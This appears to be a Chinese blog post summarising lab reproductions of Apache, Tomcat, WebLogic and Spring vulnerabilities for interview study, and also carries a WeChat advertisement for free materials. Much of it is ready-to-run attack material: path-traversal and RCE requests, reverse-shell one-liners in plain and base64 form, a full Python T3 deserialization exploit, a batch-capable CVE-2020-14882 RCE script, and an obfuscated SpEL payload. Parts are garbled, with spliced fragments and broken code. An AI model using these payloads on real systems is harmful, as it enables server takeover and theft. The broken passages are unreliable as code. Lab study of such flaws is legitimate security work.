中央件漏洞攻防学习总结
媒介面试常问的一些中央件,学习总结一下。以下环境分别利用vulhub和vulfocus复现。
Apache
apache 文件上传 (CVE-2017-15715)
描述: Apache(音译为阿帕奇)是世界利用排名第一的Web服务器软件。它可以运行在险些所有广泛利用的计算机平台上,由于其跨平台和安全性被广泛利用,是最流行的Web服务器端软件之一。 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀举行解析,导致绕过一些服务器的安全计谋
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514260.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514314.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514335.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514322.png 说明是黑名单绕过 利用编码器,在php后面加0a https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514269.png 这里加a是方便修改0a https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514302.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514012.png
apache httpd解析漏洞
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514308.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514977.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514069.png 查看配置文件grep -rn "x-httpd-php" https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514932.png
改漏洞存在的主要原因是这个配置文件的原因
【----帮助网安学习,以下所有学习资料免费领!加vx:dctintin,备注 “博客园” 获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技能电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
Apache SSI 远程命令实行漏洞
在测试恣意文件上传漏洞的时间,目的服务端可能不允许上传php后缀的文件。如果目的服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用语法实行恣意命令。 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514143.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514748.png 有限制,影响版本是apache全版本,支持SSI与CGI 默认的扩展名是 .stm、.shtm 和 .shtml https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514917.png
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514927.png
CVE-2021-41773 目录穿越
Apache HTTP Server2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如体系配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求实行命令,控制服务器。https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514547.png 符合版本 payloadhttps://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514530.png curl -v --path-as-is http://192.168.48.144:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
CVE-2021-42013 RCE&目录遍历&文件解析
apache HTTP Server2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以利用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的掩护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码实行。此问题仅影响 Apache2.4.49 和 Apache2.4.50,而不影响更早版本 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514617.png POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1 Host: 192.168.48.144:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 If-None-Match: "2d-432a5e4a73a80" If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 7
echo;id https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514651.png
Tomcat
CVE-2017-12615 文件上传
当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过经心构造的攻击请求数据包向服务器上传包含恣意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器实行, 导致服务器上的数据泄露或获取服务器权限 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514693.png 这里存在PUT恣意文件上传漏洞 但是值得一提的是这里有个细节,org.apache.jasper.servlet.JspServlet:默认处理jsp,jspx文件请求,不存在PUT上传逻辑,无法处理PUT请求 org.apache.catalina.servlets.DefaultServlet:默认处理静态文件(除jsp,jspx之外的文件),存在PUT上传处理逻辑,可以处理PUT请求。 也就是我们想要上传JSP文件的话,需要举行绕过,这里其实相当于黑名单逻辑,那么我可以通过windows特性对其举行绕过。 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514128.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514147.png 加/绕过 PUT /2.jsp/ HTTP/1.1 Host: 192.168.48.144:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 300
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514809.png /绕过 %20绕过 xxx.jsp::$DATA绕过 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514840.png 冰蝎马毗连 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514949.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514877.png
CVE-2020-1938 文件包含
ApacheTomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的恣意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的实行。 漏洞影响的产物版本包罗: Tomcat6.* Tomcat7. soapenv:Header /bin/bash -c bash -i >& /dev/tcp/ip/6664 0>&1 /work:WorkContext /soapenv:Header soapenv:Body/ /soapenv:Envelope :::
weblogic 反序列化(CVE-2018-2628)
该漏洞通过T3协议触发,可导致远程命令实行 漏洞影响版本
[*]Weblogic 10.3.6.0
[*]Weblogic 12.1.3.0
[*]Weblogic 12.2.1.2
[*]Weblogic 12.2.1.3
什么是T3协议? T用于在Weblogic服务器和其他类型的Java程序之间传输信息的协议。Weblogic会跟踪毗连到应用程序的每个Java虚拟机,要将流量传输到Java虚拟机,Weblogic会创建一个T3毗连。该链接会通过消除在网络之间的多个协议来最大化服从,从而利用较少的操作体系资源。用于T3毗连的协议还可以最大限度减少数据包大小,提高传输速率 http://192.168.48.144:7001/ 访问7001端口,也是这个页面,类似springboot,可以用这个作为weblogic的特征 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514993.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514072.png
bash -i >& /dev/tcp/192.168.48.144/6677 0>&1 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82Njc3IDA+JjE=
java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82Njc3IDA+JjE=}|{base64,-d}|{bash,-i}' https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514180.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514555.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514687.png CVE-2018-2628 EXP
from __future__ import print_function
import binascii
import os
import socket
import sys
import time
def generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
#generates ysoserial payload
command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)
print("command: " + command)
os.system(command)
bin_file = open('payload.out','rb').read()
return binascii.hexlify(bin_file)
def t3_handshake(sock, server_addr):
sock.connect(server_addr)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
print('handshake successful')
def build_t3_request_object(sock, port):
data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
data3 = '1a7727000d3234322e323134'
data4 = '2e312e32353461863d1d0000000078'
for d in :
sock.send(d.decode('hex'))
time.sleep(2)
print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))
def send_payload_objdata(sock, data):
payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
payload+=data
payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
sock.send(payload.decode('hex'))
time.sleep(2)
sock.send(payload.decode('hex'))
res = ''
try:
while True:
res += sock.recv(4096)
time.sleep(0.1)
except Exception:
pass
return res
def exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(65)
server_addr = (dip, dport)
t3_handshake(sock, server_addr)
build_t3_request_object(sock, dport)
payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)
print("payload: " + payload)
rs=send_payload_objdata(sock, payload)
print('response: ' + rs)
print('exploit completed!')
if __name__=="__main__":
#check for args, print usage if incorrect
if len(sys.argv) != 7:
print('\nUsage:\nexploit.py '
' \n')
sys.exit()
dip = sys.argv
dport = int(sys.argv)
path_ysoserial = sys.argv
jrmp_listener_ip = sys.argv
jrmp_listener_port = sys.argv
jrmp_client = sys.argv
exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)weblogic 未授权RCE(CVE-2020-14882)
漏洞影响版本 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1.4.0 Oracle Weblogic Server 14.1.1.0.0 payload 未授权访问后台 http://192.168.48.144:7001/console/images/%252E%252E%252Fconsole.portal?nfpb=true&pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514770.png 未授权RCE利用脚本 https://github.com/GGyao/CVE-2020-14882_ALL/blob/master/CVE-2020-14882_ALL.py :::info #coding:utf-8 import requests import sys import argparse import http.client
http.client.HTTPConnection.http_vsn = 10 http.client.HTTPConnection.http_vsn_str = 'HTTP/1.0'
requests.packages.urllib3.disable_warnings()
#功能1方法:回显命令实行。 def command(url_cmd,headers_cmd,url): try: res = requests.get(url_cmd, headers = headers_cmd,timeout = 15, verify = False) if " _ < > _ < / /| | \ / | | / /| || / /| || | | | | || () | () / / _| \/ |__| ||_/_|___/ || |_| _/ _/|
else:
print ("[-] " + url + " not vulnerable or command error!")
except Exception as e:
#print (e)
print ("[-] " + url + " not vulnerable or command error!")"""
Author:GGyao
Github:(https://github.com/GGyao) #command(url_cmd,post_cmd,headers_cmd,url) command(url_cmd,headers_cmd,url)
print (banner)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port。")
parser.add_argument("-f", "--file", help="Target File; Example:target.txt。")
parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
parser.add_argument("-x", "--xml", help="Remote XML file; Example:(http://vpsip/poc.xml;) ")
args = parser.parse_args()
#功能1:命令回显。
if args.url != None and args.cmd != None:
url = args.url
url_cmd = args.url + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
headers_cmd = {
'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
'cmd':args.cmd,
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Content-Type':'application/x-www-form-urlencoded'
}
#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""#功能2:weblogic 12.x命令执行。
if args.url != None and args.xml != None:
url_cmd = args.url + '/console/images/%252e%252e/console.portal'
headers_12 = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Content-Type':'application/x-www-form-urlencoded'
}
post_12 = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22{}%22)""".format(args.xml)
weblogic_12(url_cmd,post_12,headers_12)
# 功能3:回显命令执行批量。
if args.file != None and args.cmd != None:
#print (1)
for Filein open(args.file):
File = File.strip()
url_cmd = File + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
print ("[*] >>> Test:" + File)
url = File
headers_cmd = {
'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
'cmd':args.cmd,
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Content-Type':'application/x-www-form-urlencoded'
}if name=="main": main() ::: python3 CVE-2020-14882.py -u http://192.168.48.144:7001 -c "whoami" https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514042.png
weblogic RCE (CVE-2023-21839)
漏洞介绍 CVE-2023-21839是Weblogic产物中的远程代码实行漏洞,由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功可能会导致Oracle Weblogic服务器被控制,远程注入操作体系命令或代码。 java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.48.144 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514101.png 利用工具举行攻击 下载地址 https://github.com/DXask88MA/Weblogic-CVE-2023-21839 java -jar Weblogic-CVE-2023-21839.jar 192.168.48.144:7001 ldap://192.168.48.144:1389/Basic/ReverseShell/192.168.48.144/6666 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514258.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514451.png 反弹shell成功
weblogic weak_password
该漏洞复现过程为通过恣意文件读取其密文和加密的密钥文件举行破解,然后用得到的密码举行登陆,利用后台文件上传举行getshell 复现过程 恣意文件读取payload hello/file.jsp?path= SerializedSystemIni.dat 二进制文件是密钥 config.xml 是密文 weblogic密码利用AES加密,老版本利用的是DES。需要找到密钥即可对密文举行解密 这里利用恣意文件读取漏洞对密钥和密文举行读取 /hello/file.jsp?path=security/SerializedSystemIni.dat https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514534.png 这里复制到文件 /hello/file.jsp?path=config/config.xml https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514746.png yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k= 利用工具举行解密 https://github.com/TideSec/Decrypt_Weblogic_Password https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514779.png Oracle@123
浅浅总结下,weblogic特征404页面。/console可访问登陆,进后台管理可以通过war包上传getshell,有xmldecode反序列化和T3协议反序列化,存在SSRF漏洞打内网漏洞
spring
spring框架 Spring是一个轻量级Java开发框架,最早有Rod Johnson创建,目的是为了解决企业级应用开发的业务逻辑层和其他各层的耦合问题。它是一个分层的JavaSE/JavaEE full-stack(一站式)轻量级开源框架,为开发Java应用程序提供全面的基础架构支持。Spring负责基础架构,因此Java开发者可以专注于应用程序的开发。 springboot框架介绍 SpringBoot是一个快速开发的框架,能过快速整合第三方框架,他是如何快速整合的呢?其实他是的基本原来是Maven依赖关系,Maven的集成,完全采用注解化,简化XML配置,内嵌HTTP服务器(Tomcate,jetty),默认嵌入Tomcat,最终以Java应用程序举行实行。 SpringBoot与SpringCloud 的区别? SpringCloud一套目前完整的微服务解决框架,功能非常强大,注册中央,客户端调用工具,服务治理(负载均衡,断路器,分布式配置中央,网管,消息总线等
敏感信息泄露漏洞
这里直接上工具扫就行 https://github.com/AabyssZG/SpringBoot-Scan 工具利用python3 SpringBoot-Scan.py -u "http://192.168.48.133:8080/" 信息泄露python3 SpringBoot-Scan.py -v "http://192.168.48.133:8080/" 漏洞利用 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514255.png
Spring-security-oauth(CVE-2016-4977)
影响版本 Spring Security OAuth 2.3到2.3.2 Spring Security OAuth 2.2到2.2.1 Spring Security OAuth 2.1到2.1.1 Spring Security OAuth 2.0到2.0.14 payload admin admin http://192.168.48.133:8080/oauth/authorize?response_type=${3*3}&client_id=acme&scope=openid&redirect_uri=http://test https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514189.png response_type参数值会被当做Spring SpEL来实行 反弹shell bash -i >& /dev/tcp/your-ip/port 0>&1 base64反弹shell bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY1IDA+JjE=}|{base64,-d}|{bash,-i} payload生成脚本
#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""
command(url_cmd,headers_cmd,url)${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(70)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(90)).concat(T(java.lang.Character).toString(71)).concat(T(java.lang.Character).toString(86)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(81)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(48)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(68)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(61)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)